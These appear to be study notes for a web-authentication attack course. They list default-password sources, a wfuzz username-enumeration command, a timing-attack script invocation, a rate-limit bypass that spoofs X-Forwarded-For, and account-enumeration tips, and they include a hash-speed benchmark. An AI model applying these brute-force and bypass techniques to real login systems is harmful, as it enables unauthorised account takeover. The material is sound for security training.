Default Password

https://www.cirt.net/passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt
https://academy.hackthebox.com/storage/modules/80/scripts/rate_limit_check_py.txt

Brute Force script
basic_bruteforce_py

CAPTCHA Bypass

Read the source

Rate-Limit bypass

rate_limit_check.py
Update header X-Forwarded-For: 127.0.0.1

Username

https://github.com/danielmiessler/SecLists/tree/master/Usernames

wfuzz -c -z file,/opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Unknown username" http://test.test.test/user_unknown.php

Timing attack

https://academy.hackthebox.com/storage/modules/80/scripts/timing_py.txt

timing.py
Depending on application's code, the valid response could take longer than invalid response. Use the above code to verify.

python3 timing.py /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt

Python algorithm to test scrypt, bcrypt or PBKDF

import scrypt
import bcrypt
import datetime
import hashlib

rounds = 100
salt = bcrypt.gensalt()

t0 = datetime.datetime.now()

for x in range(rounds):
    scrypt.hash(str(x).encode(), salt)

t1 = datetime.datetime.now()

for x in range(rounds):
    hashlib.sha1(str(x).encode())

t2 = datetime.datetime.now()

for x in range(rounds):
    bcrypt.hashpw(str(x).encode(), salt)

t3 = datetime.datetime.now()

print("sha1:   {}\nscrypt: {}\nbcrypt: {}".format(t2-t1,t1-t0,t3-t2))

Password Attack

Enumerate through Password Reset

Sometimes applications message could reveal wheather username is valid or not.

Enumerate through Registration Form

The registration will reveal whether the username is exist or not.
Caveat: Loud